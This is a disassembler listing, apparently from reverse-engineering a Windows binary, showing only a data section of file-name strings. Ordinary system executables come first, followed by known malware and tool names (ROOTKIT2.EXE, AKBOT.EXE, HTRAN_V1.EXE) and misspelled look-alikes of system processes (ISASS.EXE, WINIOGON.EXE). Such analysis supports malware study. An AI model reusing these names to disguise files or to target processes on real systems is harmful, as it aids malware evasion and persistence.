aShadow_exe db 'shadow.exe',0 ; DATA XREF: .text:00448D1C�o
align 4
aSfc_exe db 'sfc.exe',0 ; DATA XREF: .text:00448D18�o
aSetver_exe db 'setver.exe',0 ; DATA XREF: .text:00448D14�o
align 10h
aSetup_exe db 'setup.exe',0 ; DATA XREF: .text:00448D10�o
align 4
aSethc_exe db 'sethc.exe',0 ; DATA XREF: .text:00448D0C�o
align 4
aSessmgr_exe db 'sessmgr.exe',0 ; DATA XREF: .text:00448D08�o
aServices_exe db 'services.exe',0 ; DATA XREF: .text:00448D04�o
align 4
aSecedit_exe db 'secedit.exe',0 ; DATA XREF: .text:00448D00�o
aSdbinst_exe db 'sdbinst.exe',0 ; DATA XREF: .text:00448CFC�o
aSchtasks_exe db 'schtasks.exe',0 ; DATA XREF: .text:00448CF8�o
align 4
aScardsvr_exe db 'scardsvr.exe',0 ; DATA XREF: .text:00448CF4�o
align 4
aSc_exe db 'sc.exe',0 ; DATA XREF: .text:00448CF0�o
align 4
aSavedump_exe db 'savedump.exe',0 ; DATA XREF: .text:00448CEC�o
align 4
aRwinsta_exe db 'rwinsta.exe',0 ; DATA XREF: .text:00448CE8�o
aRunonce_exe db 'runonce.exe',0 ; DATA XREF: .text:00448CE4�o
aRundll32_exe db 'rundll32.exe',0 ; DATA XREF: .text:00448CE0�o
align 4
aRunas_exe db 'runas.exe',0 ; DATA XREF: .text:00448CDC�o
align 4
aRtlcpl_exe db 'RTLCPL.EXE',0 ; DATA XREF: .text:00448CD8�o
; .text:00448F9C�o
align 4
aRtcshare_exe db 'rtcshare.exe',0 ; DATA XREF: .text:00448CD4�o
align 4
aRsvp_exe db 'rsvp.exe',0 ; DATA XREF: .text:00448CD0�o
align 10h
aRsopprov_exe db 'rsopprov.exe',0 ; DATA XREF: .text:00448CCC�o
align 10h
aRsnotify_exe db 'rsnotify.exe',0 ; DATA XREF: .text:00448CC8�o
align 10h
aRsmui_exe db 'rsmui.exe',0 ; DATA XREF: .text:00448CC4�o
align 4
aRsmsink_exe db 'rsmsink.exe',0 ; DATA XREF: .text:00448CC0�o
aRsm_exe db 'rsm.exe',0 ; DATA XREF: .text:00448CBC�o
aRsh_exe db 'rsh.exe',0 ; DATA XREF: .text:00448CB8�o
aRoutemon_exe db 'routemon.exe',0 ; DATA XREF: .text:00448CB4�o
align 4
aRoute_exe db 'route.exe',0 ; DATA XREF: .text:00448CB0�o
align 4
aRexec_exe db 'rexec.exe',0 ; DATA XREF: .text:00448CAC�o
align 10h
aReset_exe db 'reset.exe',0 ; DATA XREF: .text:00448CA8�o
align 4
aReplace_exe db 'replace.exe',0 ; DATA XREF: .text:00448CA4�o
aRelog_exe db 'relog.exe',0 ; DATA XREF: .text:00448CA0�o
align 4
aRegwiz_exe db 'regwiz.exe',0 ; DATA XREF: .text:00448C9C�o
align 10h
aRegsvr32_exe db 'regsvr32.exe',0 ; DATA XREF: .text:00448C98�o
align 10h
aRegini_exe db 'regini.exe',0 ; DATA XREF: .text:00448C94�o
align 4
aRegedt32_exe db 'regedt32.exe',0 ; DATA XREF: .text:00448C90�o
align 4
aRegcladm_exe db 'REGCLADM.EXE',0 ; DATA XREF: .text:00448C8C�o
align 4
aReg_exe db 'reg.exe',0 ; DATA XREF: .text:00448C88�o
aRedir_exe db 'redir.exe',0 ; DATA XREF: .text:00448C84�o
align 10h
aRecover_exe db 'recover.exe',0 ; DATA XREF: .text:00448C80�o
aRdshost_exe db 'rdshost.exe',0 ; DATA XREF: .text:00448C7C�o
aRdsaddin_exe db 'rdsaddin.exe',0 ; DATA XREF: .text:00448C78�o
align 4
aRdpclip_exe db 'rdpclip.exe',0 ; DATA XREF: .text:00448C74�o
aRcp_exe db 'rcp.exe',0 ; DATA XREF: .text:00448C70�o
aRcimlby_exe db 'rcimlby.exe',0 ; DATA XREF: .text:00448C6C�o
aRasphone_exe db 'rasphone.exe',0 ; DATA XREF: .text:00448C68�o
align 4
aRasdial_exe db 'rasdial.exe',0 ; DATA XREF: .text:00448C64�o
aRasautou_exe db 'rasautou.exe',0 ; DATA XREF: .text:00448C60�o
align 4
aQwinsta_exe db 'qwinsta.exe',0 ; DATA XREF: .text:00448C5C�o
aQprocess_exe db 'qprocess.exe',0 ; DATA XREF: .text:00448C58�o
align 10h
aQappsrv_exe db 'qappsrv.exe',0 ; DATA XREF: .text:00448C54�o
aProxycfg_exe db 'proxycfg.exe',0 ; DATA XREF: .text:00448C50�o
align 4
aProquota_exe db 'proquota.exe',0 ; DATA XREF: .text:00448C4C�o
align 4
aProgman_exe db 'progman.exe',0 ; DATA XREF: .text:00448C48�o
aPrint_exe db 'print.exe',0 ; DATA XREF: .text:00448C44�o
align 4
aPowercfg_exe db 'powercfg.exe',0 ; DATA XREF: .text:00448C40�o
align 4
aPing6_exe db 'ping6.exe',0 ; DATA XREF: .text:00448C3C�o
align 10h
aPing_exe db 'ping.exe',0 ; DATA XREF: .text:00448C38�o
align 4
aPerfmon_exe db 'perfmon.exe',0 ; DATA XREF: .text:00448C34�o
aPentnt_exe db 'pentnt.exe',0 ; DATA XREF: .text:00448C30�o
align 4
aPathping_exe db 'pathping.exe',0 ; DATA XREF: .text:00448C2C�o
align 4
aPackager_exe db 'packager.exe',0 ; DATA XREF: .text:00448C28�o
align 4
aOsuninst_exe db 'osuninst.exe',0 ; DATA XREF: .text:00448C24�o
align 4
aOsk_exe db 'osk.exe',0 ; DATA XREF: .text:00448C20�o
aOpenfiles_exe db 'openfiles.exe',0 ; DATA XREF: .text:00448C1C�o
align 4
aOdbcconf_exe db 'odbcconf.exe',0 ; DATA XREF: .text:00448C18�o
align 4
aOdbcad32_exe db 'odbcad32.exe',0 ; DATA XREF: .text:00448C14�o
align 4
aNwscript_exe db 'nwscript.exe',0 ; DATA XREF: .text:00448C10�o
align 4
aNw16_exe db 'nw16.exe',0 ; DATA XREF: .text:00448C0C�o
align 4
aNtvdm_exe db 'ntvdm.exe',0 ; DATA XREF: .text:00448C08�o
align 4
aNtsd_exe db 'ntsd.exe',0 ; DATA XREF: .text:00448C04�o
align 10h
aNtoskrnl_exe db 'ntoskrnl.exe',0 ; DATA XREF: .text:00448C00�o
align 10h
aNtkrnlpa_exe db 'ntkrnlpa.exe',0 ; DATA XREF: .text:00448BFC�o
align 10h
aNtbackup_exe db 'ntbackup.exe',0 ; DATA XREF: .text:00448BF8�o
align 10h
aNslookup_exe db 'nslookup.exe',0 ; DATA XREF: .text:00448BF4�o
align 10h
aNotepad_exe_0 db 'notepad.exe',0 ; DATA XREF: .text:00448BF0�o
; .text:00449074�o
aNlsfunc_exe db 'nlsfunc.exe',0 ; DATA XREF: .text:00448BEC�o
aNetstat_exe db 'netstat.exe',0 ; DATA XREF: .text:00448BE8�o
aNetsh_exe db 'netsh.exe',0 ; DATA XREF: .text:00448BE4�o
align 10h
aNetsetup_exe db 'netsetup.exe',0 ; DATA XREF: .text:00448BE0�o
align 10h
aNetdde_exe db 'netdde.exe',0 ; DATA XREF: .text:00448BDC�o
align 4
aNet1_exe db 'net1.exe',0 ; DATA XREF: .text:00448BD8�o
align 4
aNet_exe db 'net.exe',0 ; DATA XREF: .text:00448BD4�o
aNerocheck_exe db 'NeroCheck.exe',0 ; DATA XREF: .text:00448BD0�o
align 10h
aNddeapir_exe db 'nddeapir.exe',0 ; DATA XREF: .text:00448BCC�o
align 10h
aNbtstat_exe db 'nbtstat.exe',0 ; DATA XREF: .text:00448BC8�o
aNarrator_exe db 'narrator.exe',0 ; DATA XREF: .text:00448BC4�o
align 4
aMstsc_exe db 'mstsc.exe',0 ; DATA XREF: .text:00448BC0�o
align 4
aMstinit_exe db 'mstinit.exe',0 ; DATA XREF: .text:00448BBC�o
aMsswchx_exe db 'msswchx.exe',0 ; DATA XREF: .text:00448BB8�o
aMspaint_exe db 'mspaint.exe',0 ; DATA XREF: .text:00448BB4�o
aMsiexec_exe db 'msiexec.exe',0 ; DATA XREF: .text:00448BB0�o
aMshta_exe db 'mshta.exe',0 ; DATA XREF: .text:00448BAC�o
align 4
aMshearts_exe db 'mshearts.exe',0 ; DATA XREF: .text:00448BA8�o
align 4
aMsg_exe db 'msg.exe',0 ; DATA XREF: .text:00448BA4�o
aMsdtc_exe db 'msdtc.exe',0 ; DATA XREF: .text:00448BA0�o
align 4
aMscdexnt_exe db 'mscdexnt.exe',0 ; DATA XREF: .text:00448B9C�o
align 4
aMrt_exe db 'MRT.exe',0 ; DATA XREF: .text:00448B98�o
aMrinfo_exe db 'mrinfo.exe',0 ; DATA XREF: .text:00448B94�o
align 4
aMqtgsvc_exe db 'mqtgsvc.exe',0 ; DATA XREF: .text:00448B90�o
aMqsvc_exe db 'mqsvc.exe',0 ; DATA XREF: .text:00448B8C�o
align 4
aMqbkup_exe db 'mqbkup.exe',0 ; DATA XREF: .text:00448B88�o
align 10h
aMpnotify_exe db 'mpnotify.exe',0 ; DATA XREF: .text:00448B84�o
align 10h
aMplay32_exe db 'mplay32.exe',0 ; DATA XREF: .text:00448B80�o
aMountvol_exe db 'mountvol.exe',0 ; DATA XREF: .text:00448B7C�o
align 4
aMobsync_exe db 'mobsync.exe',0 ; DATA XREF: .text:00448B78�o
aMnmsrvc_exe db 'mnmsrvc.exe',0 ; DATA XREF: .text:00448B74�o
aMmc_exe db 'mmc.exe',0 ; DATA XREF: .text:00448B70�o
aMigpwd_exe db 'migpwd.exe',0 ; DATA XREF: .text:00448B6C�o
align 4
aMem_exe db 'mem.exe',0 ; DATA XREF: .text:00448B68�o
aMakecab_exe db 'makecab.exe',0 ; DATA XREF: .text:00448B64�o
aMagnify_exe db 'magnify.exe',0 ; DATA XREF: .text:00448B60�o
aLsass_exe db 'lsass.exe',0 ; DATA XREF: .text:00448B5C�o
align 4
aLpr_exe db 'lpr.exe',0 ; DATA XREF: .text:00448B58�o
aLpq_exe db 'lpq.exe',0 ; DATA XREF: .text:00448B54�o
aLogonui_exe db 'logonui.exe',0 ; DATA XREF: .text:00448B50�o
aLogoff_exe db 'logoff.exe',0 ; DATA XREF: .text:00448B4C�o
align 4
aLogman_exe db 'logman.exe',0 ; DATA XREF: .text:00448B48�o
align 4
aLogagent_exe db 'logagent.exe',0 ; DATA XREF: .text:00448B44�o
align 4
aLodctr_exe db 'lodctr.exe',0 ; DATA XREF: .text:00448B40�o
align 4
aLocator_exe db 'locator.exe',0 ; DATA XREF: .text:00448B3C�o
aLnkstub_exe db 'lnkstub.exe',0 ; DATA XREF: .text:00448B38�o
aLights_exe db 'lights.exe',0 ; DATA XREF: .text:00448B34�o
align 4
aLabel_exe db 'label.exe',0 ; DATA XREF: .text:00448B30�o
align 4
aKrnl386_exe db 'krnl386.exe',0 ; DATA XREF: .text:00448B2C�o
aJview_exe db 'jview.exe',0 ; DATA XREF: .text:00448B28�o
align 4
aJdbgmgr_exe db 'jdbgmgr.exe',0 ; DATA XREF: .text:00448B24�o
aJavaws_exe db 'javaws.exe',0 ; DATA XREF: .text:00448B20�o
align 4
aJavaw_exe db 'javaw.exe',0 ; DATA XREF: .text:00448B1C�o
align 10h
aJava_exe db 'java.exe',0 ; DATA XREF: .text:00448B18�o
align 4
aIpxroute_exe db 'ipxroute.exe',0 ; DATA XREF: .text:00448B14�o
align 4
aIpv6_exe db 'ipv6.exe',0 ; DATA XREF: .text:00448B10�o
align 4
aIpsec6_exe db 'ipsec6.exe',0 ; DATA XREF: .text:00448B0C�o
align 4
aIpconfig_exe db 'ipconfig.exe',0 ; DATA XREF: .text:00448B08�o
align 4
aImapi_exe db 'imapi.exe',0 ; DATA XREF: .text:00448B04�o
align 10h
aIexpress_exe db 'iexpress.exe',0 ; DATA XREF: .text:00448B00�o
align 10h
aIe4uinit_exe db 'ie4uinit.exe',0 ; DATA XREF: .text:00448AFC�o
align 10h
aHostname_exe db 'hostname.exe',0 ; DATA XREF: .text:00448AF8�o
align 10h
aHelp_exe db 'help.exe',0 ; DATA XREF: .text:00448AF4�o
align 4
aGrpconv_exe db 'grpconv.exe',0 ; DATA XREF: .text:00448AF0�o
aGpupdate_exe db 'gpupdate.exe',0 ; DATA XREF: .text:00448AEC�o
align 4
aGpresult_exe db 'gpresult.exe',0 ; DATA XREF: .text:00448AE8�o
align 4
aGetmac_exe db 'getmac.exe',0 ; DATA XREF: .text:00448AE4�o
align 4
aGdi_exe db 'gdi.exe',0 ; DATA XREF: .text:00448AE0�o
aGb2312_uce db 'gb2312.uce',0 ; DATA XREF: .text:00448ADC�o
align 4
aFtp_exe db 'ftp.exe',0 ; DATA XREF: .text:00448AD8�o
aFsutil_exe db 'fsutil.exe',0 ; DATA XREF: .text:00448AD4�o
align 4
aFsquirt_exe db 'fsquirt.exe',0 ; DATA XREF: .text:00448AD0�o
aFreecell_exe db 'freecell.exe',0 ; DATA XREF: .text:00448ACC�o
align 4
aForcedos_exe db 'forcedos.exe',0 ; DATA XREF: .text:00448AC8�o
align 4
aFontview_exe db 'fontview.exe',0 ; DATA XREF: .text:00448AC4�o
align 4
aFltmc_exe db 'fltMc.exe',0 ; DATA XREF: .text:00448AC0�o
align 4
aFixmapi_exe db 'fixmapi.exe',0 ; DATA XREF: .text:00448ABC�o
aFinger_exe db 'finger.exe',0 ; DATA XREF: .text:00448AB8�o
align 4
aFindstr_exe db 'findstr.exe',0 ; DATA XREF: .text:00448AB4�o
aFind_exe db 'find.exe',0 ; DATA XREF: .text:00448AB0�o
align 4
aFc_exe db 'fc.exe',0 ; DATA XREF: .text:00448AAC�o
align 4
aFastopen_exe db 'fastopen.exe',0 ; DATA XREF: .text:00448AA8�o
align 4
aExtrac32_exe db 'extrac32.exe',0 ; DATA XREF: .text:00448AA4�o
align 4
aExpand_exe db 'expand.exe',0 ; DATA XREF: .text:00448AA0�o
align 4
aExe2bin_exe db 'exe2bin.exe',0 ; DATA XREF: .text:00448A9C�o
aEventvwr_exe db 'eventvwr.exe',0 ; DATA XREF: .text:00448A98�o
align 4
aEventtriggers_ db 'eventtriggers.exe',0 ; DATA XREF: .text:00448A94�o
align 4
aEventcreate_ex db 'eventcreate.exe',0 ; DATA XREF: .text:00448A90�o
aEudcedit_exe db 'eudcedit.exe',0 ; DATA XREF: .text:00448A8C�o
align 4
aEsentutl_exe db 'esentutl.exe',0 ; DATA XREF: .text:00448A88�o
align 4
aEdlin_exe db 'edlin.exe',0 ; DATA XREF: .text:00448A84�o
align 4
aDxdiag_exe db 'dxdiag.exe',0 ; DATA XREF: .text:00448A80�o
align 10h
aDwwin_exe db 'dwwin.exe',0 ; DATA XREF: .text:00448A7C�o
align 4
aDvdupgrd_exe db 'dvdupgrd.exe',0 ; DATA XREF: .text:00448A78�o
align 4
aDvdplay_exe db 'dvdplay.exe',0 ; DATA XREF: .text:00448A74�o
aDumprep_exe db 'dumprep.exe',0 ; DATA XREF: .text:00448A70�o
aDrwtsn32_exe db 'drwtsn32.exe',0 ; DATA XREF: .text:00448A6C�o
align 4
aDrwatson_exe db 'drwatson.exe',0 ; DATA XREF: .text:00448A68�o
align 4
aDriverquery_ex db 'driverquery.exe',0 ; DATA XREF: .text:00448A64�o
aDpvsetup_exe db 'dpvsetup.exe',0 ; DATA XREF: .text:00448A60�o
align 4
aDpnsvr_exe db 'dpnsvr.exe',0 ; DATA XREF: .text:00448A5C�o
align 10h
aDplaysvr_exe db 'dplaysvr.exe',0 ; DATA XREF: .text:00448A58�o
align 10h
aDosx_exe db 'dosx.exe',0 ; DATA XREF: .text:00448A54�o
align 4
aDoskey_exe db 'doskey.exe',0 ; DATA XREF: .text:00448A50�o
align 4
aDmremote_exe db 'dmremote.exe',0 ; DATA XREF: .text:00448A4C�o
align 4
aDmadmin_exe db 'dmadmin.exe',0 ; DATA XREF: .text:00448A48�o
aDllhst3g_exe db 'dllhst3g.exe',0 ; DATA XREF: .text:00448A44�o
align 4
aDllhost_exe db 'dllhost.exe',0 ; DATA XREF: .text:00448A40�o
aDiskperf_exe db 'diskperf.exe',0 ; DATA XREF: .text:00448A3C�o
align 10h
aDiskpart_exe db 'diskpart.exe',0 ; DATA XREF: .text:00448A38�o
align 10h
aDiantz_exe db 'diantz.exe',0 ; DATA XREF: .text:00448A34�o
align 4
aDfrgntfs_exe db 'dfrgntfs.exe',0 ; DATA XREF: .text:00448A30�o
align 4
aDfrgfat_exe db 'dfrgfat.exe',0 ; DATA XREF: .text:00448A2C�o
aDefrag_exe db 'defrag.exe',0 ; DATA XREF: .text:00448A28�o
align 4
aDebug_exe db 'debug.exe',0 ; DATA XREF: .text:00448A24�o
align 10h
aDdeshare_exe db 'ddeshare.exe',0 ; DATA XREF: .text:00448A20�o
align 10h
aDcomcnfg_exe db 'dcomcnfg.exe',0 ; DATA XREF: .text:00448A1C�o
align 10h
aCtfmon_exe db 'ctfmon.exe',0 ; DATA XREF: .text:00448A18�o
align 4
aCsrss_exe db 'csrss.exe',0 ; DATA XREF: .text:00448A14�o
align 4
aCscript_exe db 'cscript.exe',0 ; DATA XREF: .text:00448A10�o
aConvert_exe db 'convert.exe',0 ; DATA XREF: .text:00448A0C�o
aControl_exe db 'control.exe',0 ; DATA XREF: .text:00448A08�o
aConime_exe db 'conime.exe',0 ; DATA XREF: .text:00448A04�o
align 4
aCompact_exe db 'compact.exe',0 ; DATA XREF: .text:00448A00�o
aComp_exe db 'comp.exe',0 ; DATA XREF: .text:004489FC�o
align 10h
aCmstp_exe db 'cmstp.exe',0 ; DATA XREF: .text:004489F8�o
align 4
aCmmon32_exe db 'cmmon32.exe',0 ; DATA XREF: .text:004489F4�o
aCmdl32_exe db 'cmdl32.exe',0 ; DATA XREF: .text:004489F0�o
align 4
aClspack_exe db 'clspack.exe',0 ; DATA XREF: .text:004489E8�o
aClipsrv_exe db 'clipsrv.exe',0 ; DATA XREF: .text:004489E4�o
aClipbrd_exe db 'clipbrd.exe',0 ; DATA XREF: .text:004489E0�o
aCliconfg_exe db 'cliconfg.exe',0 ; DATA XREF: .text:004489DC�o
align 4
aCleanmgr_exe db 'cleanmgr.exe',0 ; DATA XREF: .text:004489D8�o
align 4
aCkcnv_exe db 'ckcnv.exe',0 ; DATA XREF: .text:004489D4�o
align 4
aCisvc_exe db 'cisvc.exe',0 ; DATA XREF: .text:004489D0�o
align 10h
aCipher_exe db 'cipher.exe',0 ; DATA XREF: .text:004489CC�o
align 4
aCidaemon_exe db 'cidaemon.exe',0 ; DATA XREF: .text:004489C8�o
align 4
aChkntfs_exe db 'chkntfs.exe',0 ; DATA XREF: .text:004489C4�o
aChkdsk_exe db 'chkdsk.exe',0 ; DATA XREF: .text:004489C0�o
align 4
aChcfg_exe db 'ChCfg.exe',0 ; DATA XREF: .text:004489BC�o
align 10h
aCharmap_exe db 'charmap.exe',0 ; DATA XREF: .text:004489B8�o
aCalc_exe db 'calc.exe',0 ; DATA XREF: .text:004489B4�o
align 4
aCacls_exe db 'cacls.exe',0 ; DATA XREF: .text:004489B0�o
align 4
aBootvrfy_exe db 'bootvrfy.exe',0 ; DATA XREF: .text:004489AC�o
align 4
aBootok_exe db 'bootok.exe',0 ; DATA XREF: .text:004489A8�o
align 10h
aBootcfg_exe db 'bootcfg.exe',0 ; DATA XREF: .text:004489A4�o
aBlastcln_exe db 'blastcln.exe',0 ; DATA XREF: .text:004489A0�o
align 4
aAutolfn_exe db 'autolfn.exe',0 ; DATA XREF: .text:0044899C�o
aAutofmt_exe db 'autofmt.exe',0 ; DATA XREF: .text:00448998�o
aAutoconv_exe db 'autoconv.exe',0 ; DATA XREF: .text:00448994�o
align 4
aAutochk_exe db 'autochk.exe',0 ; DATA XREF: .text:00448990�o
aAuditusr_exe db 'auditusr.exe',0 ; DATA XREF: .text:0044898C�o
align 10h
aAttrib_exe db 'attrib.exe',0 ; DATA XREF: .text:00448988�o
align 4
aAtmadm_exe db 'atmadm.exe',0 ; DATA XREF: .text:00448984�o
align 4
aAti2mdxx_exe db 'Ati2mdxx.exe',0 ; DATA XREF: .text:00448980�o
align 4
aAti2evxx_exe db 'ati2evxx.exe',0 ; DATA XREF: .text:0044897C�o
; .text:00448EC4�o
align 4
aAt_exe db 'at.exe',0 ; DATA XREF: .text:00448978�o
align 10h
aAsr_pfu_exe db 'asr_pfu.exe',0 ; DATA XREF: .text:00448974�o
aAsr_ldm_exe db 'asr_ldm.exe',0 ; DATA XREF: .text:00448970�o
aAsr_fmt_exe db 'asr_fmt.exe',0 ; DATA XREF: .text:0044896C�o
aArp_exe db 'arp.exe',0 ; DATA XREF: .text:00448968�o
aAppend_exe db 'append.exe',0 ; DATA XREF: .text:00448964�o
align 4
aAlg_exe db 'alg.exe',0 ; DATA XREF: .text:00448960�o
aAhui_exe db 'ahui.exe',0 ; DATA XREF: .text:0044895C�o
align 4
aActmovie_exe db 'actmovie.exe',0 ; DATA XREF: .text:00448958�o
align 4
aAccwiz_exe db 'accwiz.exe',0 ; DATA XREF: .text:00448954�o
align 4
aHdashcut_exe db 'HDAShCut.exe',0 ; DATA XREF: .text:00448950�o
; .text:00448F94�o
align 4
aKeystone_exe db 'keystone.exe',0 ; DATA XREF: .text:0044894C�o
align 4
aNwiz_exe db 'nwiz.exe',0 ; DATA XREF: .text:00448948�o
align 4
aNvcplui_exe db 'nvcplui.exe',0 ; DATA XREF: .text:00448944�o
aNvdspsch_exe db 'nvdspsch.exe',0 ; DATA XREF: .text:00448940�o
align 10h
aNvcolor_exe db 'nvcolor.exe',0 ; DATA XREF: .text:0044893C�o
aNvappbar_exe db 'nvappbar.exe',0 ; DATA XREF: .text:00448938�o
align 4
aNvudisp_exe db 'nvudisp.exe',0 ; DATA XREF: .text:00448934�o
aNvsvc32_exe db 'nvsvc32.exe',0 ; DATA XREF: .text:00448930�o
aNvuninst_exe db 'NVUNINST.EXE',0 ; DATA XREF: .text:0044892C�o
align 4
aSview_exe db 'sview.exe',0 ; DATA XREF: .text:00448928�o
align 10h
aNview_exe db 'nview.exe',0 ; DATA XREF: .text:00448924�o
align 4
aWmsoft_exe db 'wmsoft*.exe',0 ; DATA XREF: .text:00448920�o
; .text:00448F88�o ...
aAsr__exe db 'asr_*.exe',0 ; DATA XREF: .text:0044891C�o
; .text:00448F84�o ...
align 4
aSysupd_exe db 'SYSUPD.EXE',0 ; DATA XREF: .text:00448910�o
align 10h
aSvshost_exe db 'SVSHOST.EXE',0 ; DATA XREF: .text:00448904�o
aSvchostc_exe db 'SVCHOSTC.EXE',0 ; DATA XREF: .text:004488FC�o
align 4
aMssmpp_exe db 'MSSMPP.EXE',0 ; DATA XREF: .text:004488F4�o
align 4
aWindows12_exe db 'WINDOWS12.EXE',0 ; DATA XREF: .text:004488F0�o
align 4
aDup_exe db 'DUP.EXE',0 ; DATA XREF: .text:004488E8�o
aNsecurity_exe db 'NSECURITY.EXE',0 ; DATA XREF: .text:004488E4�o
align 10h
aInssvc_exe db 'INSSVC.EXE',0 ; DATA XREF: .text:004488DC�o
align 4
aDog_bat db 'DOG.BAT',0 ; DATA XREF: .text:004488D8�o
aMsnet_bat db 'MSNET.BAT',0 ; DATA XREF: .text:004488D0�o
align 10h
aRootkit2_exe db 'ROOTKIT2.EXE',0 ; DATA XREF: .text:004488CC�o
align 10h
aRun_bot_bat_ex db 'RUN_BOT.BAT.EXE',0 ; DATA XREF: .text:004488C8�o
aLogoner_exe db 'LOGONER.EXE',0 ; DATA XREF: .text:004488C4�o
aLogdec_exe db 'LOGDEC.EXE',0 ; DATA XREF: .text:004488C0�o
align 4
aWebxgrab_exe db 'WEBXGRAB.EXE',0 ; DATA XREF: .text:004488BC�o
align 4
aGg_exe db 'GG.EXE',0 ; DATA XREF: .text:004488B8�o
align 10h
aWolff_exe db 'WOLFF.EXE',0 ; DATA XREF: .text:004488B0�o
align 4
aHz_exe db 'HZ.EXE',0 ; DATA XREF: .text:004488AC�o
align 4
aWinpga_exe db 'WINPGA.EXE',0 ; DATA XREF: .text:004488A8�o
align 10h
aWqrtuhx_exe db 'WQRTUHX.EXE',0 ; DATA XREF: .text:004488A4�o
aDmi_exe db 'DMI.EXE',0 ; DATA XREF: .text:004488A0�o
aRspool_exe db 'RSPOOL.EXE',0 ; DATA XREF: .text:0044889C�o
align 10h
aIrb_exe db 'IRB.EXE',0 ; DATA XREF: .text:00448898�o
aV1rg1n_exe db 'V1RG1N.EXE',0 ; DATA XREF: .text:00448894�o
align 4
aRopnc_exe db 'ROPNC.EXE',0 ; DATA XREF: .text:00448890�o
align 10h
aXgun_exe db 'XGUN.EXE',0 ; DATA XREF: .text:0044888C�o
align 4
aAdv693_exe db 'ADV693.EXE',0 ; DATA XREF: .text:00448888�o
align 4
aJssa_exe db 'JSSA.EXE',0 ; DATA XREF: .text:00448884�o
align 4
aV1rgf_exe db 'V1RGF.EXE',0 ; DATA XREF: .text:00448880�o
align 10h
aU_exe db 'U.EXE',0 ; DATA XREF: .text:0044887C�o
align 4
aV1rg1n_exe_0 db 'V1Rg1N.EXE',0 ; DATA XREF: .text:00448878�o
align 4
aKa6ber_exe db 'KA6BER.EXE',0 ; DATA XREF: .text:00448874�o
align 10h
aTest_exe db 'TEST.EXE',0 ; DATA XREF: .text:00448870�o
align 4
aScans_exe db 'SCANS.EXE',0 ; DATA XREF: .text:0044886C�o
align 4
aSecuraq_exe db 'SECURAQ.EXE',0 ; DATA XREF: .text:00448868�o
aPs2m_exe db 'PS2M.EXE',0 ; DATA XREF: .text:00448864�o
align 10h
aOurnik_exe db 'OURNIK.EXE',0 ; DATA XREF: .text:00448860�o
align 4
aO1o2o3o4_exe db 'O1O2O3O4.EXE',0 ; DATA XREF: .text:0044885C�o
align 4
aOf_exe db 'OF.EXE',0 ; DATA XREF: .text:00448858�o
align 4
aTamer_bat_exe db 'TAMER.BAT.EXE',0 ; DATA XREF: .text:00448854�o
align 4
a5h7h8v6b1c5_ex db '5H7H8V6B1C5.EXE',0 ; DATA XREF: .text:00448850�o
aDual_exe db 'DUAL.EXE',0 ; DATA XREF: .text:0044884C�o
align 10h
aNxm_exe db 'NXM.EXE',0 ; DATA XREF: .text:00448848�o
aGt_exe db 'GT.EXE',0 ; DATA XREF: .text:00448844�o
align 10h
aNope_exe db 'NOPE.EXE',0 ; DATA XREF: .text:00448840�o
align 4
aM_exe db 'M.EXE',0 ; DATA XREF: .text:0044883C�o
align 4
aLoadadv735_exe db 'LOADADV735.EXE',0 ; DATA XREF: .text:00448838�o
align 4
aAbo_exe db 'ABO.EXE',0 ; DATA XREF: .text:00448834�o
aLam_exe db 'LAM.EXE',0 ; DATA XREF: .text:00448830�o
aBox_exe db 'BOX.EXE',0 ; DATA XREF: .text:0044882C�o
aHtran_v1_exe db 'HTRAN_V1.EXE',0 ; DATA XREF: .text:00448824�o
align 4
aRserver_exe db 'RSERVER.EXE',0 ; DATA XREF: .text:00448820�o
aJoined_exe db 'JOINED.EXE',0 ; DATA XREF: .text:0044881C�o
align 4
aHookiat_exe db 'HOOKIAT.EXE',0 ; DATA XREF: .text:00448818�o
aUay_exe db 'UAY.EXE',0 ; DATA XREF: .text:00448814�o
aOwnt_exe db 'OWNT.EXE',0 ; DATA XREF: .text:00448810�o
align 4
aWnetwork_exe db 'WNETWORK.EXE',0 ; DATA XREF: .text:0044880C�o
align 4
aWishs_exewsemg db 'WISHS.EXEWSEMGR.EXE',0 ; DATA XREF: .text:00448808�o
aW32sim_exe db 'W32SIM.EXE',0 ; DATA XREF: .text:00448804�o
align 4
aDisk10_exe db 'DISK10.EXE',0 ; DATA XREF: .text:00448800�o
align 10h
aWinclean_exe db 'WINCLEAN.EXE',0 ; DATA XREF: .text:004487FC�o
align 10h
aWinuppd_exe db 'WINUPPD.EXE',0 ; DATA XREF: .text:004487F8�o
aIsass_exe db 'ISASS.EXE',0 ; DATA XREF: .text:004487F4�o
align 4
aWiniogon_exe db 'WINIOGON.EXE',0 ; DATA XREF: .text:004487F0�o
align 4
aSpooisv_exe db 'SPOOISV.EXE',0 ; DATA XREF: .text:004487EC�o
aVideoati0_exe db 'VIDEOATI0.EXE',0 ; DATA XREF: .text:004487E8�o
align 4
aIs67538_exe db 'IS67538.EXE',0 ; DATA XREF: .text:004487E4�o
aBlkl_exe db 'BLKL.EXE',0 ; DATA XREF: .text:004487E0�o
; .text:00448828�o
align 4
aBulk_exe db 'BULK.EXE',0 ; DATA XREF: .text:004487DC�o
align 4
aMswdns32_exe db 'MSWDNS32.EXE',0 ; DATA XREF: .text:004487D8�o
align 4
aWinpkr_exe db 'WINPKR.EXE',0 ; DATA XREF: .text:004487D4�o
align 4
aWinsnte_exe db 'WINSNTE.EXE',0 ; DATA XREF: .text:004487D0�o
aEbay_exe db 'EBAY.EXE',0 ; DATA XREF: .text:004487CC�o
align 4
aWanmpsvc_exe db 'WANMPSVC.EXE',0 ; DATA XREF: .text:004487C8�o
align 4
aWebmsn_exe db 'WEBMSN.EXE',0 ; DATA XREF: .text:004487C4�o
align 4
aSysmgr64_exe db 'SYSMGR64.EXE',0 ; DATA XREF: .text:004487C0�o
align 4
aWmism23_exe db 'WMISM23.EXE',0 ; DATA XREF: .text:004487BC�o
aWinupdaterar_e db 'WINUPDATERAR.EXE',0 ; DATA XREF: .text:004487B8�o
align 4
aWinsocket_exe db 'WINSOCKET.EXE',0 ; DATA XREF: .text:004487B4�o
align 4
aSsql_exe db 'SSQL.EXE',0 ; DATA XREF: .text:004487B0�o
align 4
aMssql32_exe db 'MSSQL32.EXE',0 ; DATA XREF: .text:004487AC�o
aSxot_exe db 'SXOT.EXE',0 ; DATA XREF: .text:004487A8�o
align 4
aAkbot_exe db 'AKBOT.EXE',0 ; DATA XREF: .text:004487A4�o
align 4
aDc_exe db 'DC.EXE',0 ; DATA XREF: .text:004487A0�o
align 10h
aDcz_exe db 'DCZ.EXE',0 ; DATA XREF: .text:0044879C�o
